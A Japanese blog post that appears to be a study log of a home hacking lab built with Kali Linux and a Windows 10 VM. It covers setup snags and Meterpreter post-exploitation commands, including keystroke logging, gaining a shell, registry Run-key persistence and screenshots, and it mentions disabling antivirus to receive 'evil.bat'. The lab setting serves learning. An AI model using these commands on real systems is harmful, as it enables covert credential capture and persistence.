LoginSignup
3

More than 1 year has passed since last update.

posted at

updated at

Organization

ハッキング・ラボのつくりかたで学んだこと

目次

1、はじめに
2、環境
3、構築で詰まったこと
4、実施したこと
5、おわりに
6、参考資料

1、はじめに

ハッキング・ラボのつくりかたを行いました。
構築/学習で行ったことや詰まったところを紹介します。
詳細は、書籍をご参照ください。

2、環境

ホストOS:Windows10 Home
VirtualBox:6.0.16
ゲストOS(Linux):Kali Linux(2020.1) VirtulBox 64-bit版
ゲストOS(Windows):Windows10(May 2020 Update)

3、構築

構築については、実施手順を紹介すると長くなるため、詰まったところを紹介します。
下記の②~④に関しては、できていなくても実施に問題ないため、詰まったら飛ばしていいかもしれません。

①ログイン時

Kali Linux(2020.1)ではrootにパスワードが設定されていないため、ログインできません。
kali/kaliでログイン可能です。

②Linuxの設定について

Settings画面が異なるため、詰まりやすいです。
左上のKaliマークから検索します。
・画面設定→「Display」
・電源設定→「Xfce Power Manager」
・キーボード→「Keyboard」

③タイムゾーンについて

別で設定します。
右上の時刻「HH:SS PM」をクリック→「Properties」→「Clock」
→「Timezone」に「Asia/Tokyo」を入力

④日本語入力について

パッケージインストール前に「apt update」「apt upgrade」の実施が必要です。
また、インストール後に適用が必要です。
「sudo dpkg-reconfigure locales」→「ja_JP.UTF-8」の場所でスペースキーを押す
→「*」がつく→Enterキー「ja_JP.UTF-8」を選択してEnterキー→再起動

⑤IPアドレスを確認する際

ifconfigを使用できません。
「ip addr show」を使用します。
ルーティング確認時は、「ip route show」で行います。

4、実施したこと

まず、Windows10に侵入する。
ゲストのWindowsにて、リアルタイムスキャンを使用していると、「evil.bat」を入手できないため、停止しておく。

①キーロガー取得

Linux側でキースキャンをスタートします。

meterpreter > keyscan_start
Starting the keystroke sniffer ...

Windows側で下記のように入力します。

password

pcuser 1234

Linux側でdumpします。
下記のような形で結果が出ます。

meterpreter > keyscan_dump
Dumping captured keystrokes...
password<CR>
<CR>
pcuser 1234<^S>

meterpreter > 

②コマンドプロンプト操作

以下のコマンドからコマンドプロンプトに入ります。

meterpreter > shell

システム権限でコマンドプロンプトに入れば、何でもできます。
例えば、Webサイトや動画の再生を行うならば、以下のコマンドです。

C:\Windows\system32>start https://xxx.xxx.xxx/
C:\Windows\system32>start xxx.mp4

③レジストリの変更

Windowsのログイン時にInternetExplorerを起動するように設定します。
「HKLM\software\microsoft\windows\currentversion\run」に「explorer.exe」を設定します。

まず、値を確認します。

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (1):

    SecurityHealth

meterpreter > 

値を変更します。

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v explorer -d  'C:\Windows\explorer.exe'
Successfully set explorer of REG_SZ.
meterpreter >

値を確認して、「explorer.exe」が追加されていることを確認します。

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (2):

    SecurityHealth
    explorer

meterpreter > 

④スクリーンショット

以下のコマンドからWindowsのスクリーンショットを取得できます。

meterpreter > screenshot

5、おわりに

Meterpreterを中心に学習を行ったため、後半のLANやWebアプリ経由のハッキングを試してみたいです。
また、他のソフトウェアを使用したハッキングも試そうと思います。

6、参考資料

ハッキング・ラボのつくりかた(こちらはメイン資料です。)
実践 Metasploit(Meterpreterに関して詳しい。)

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
What you can do with signing up
3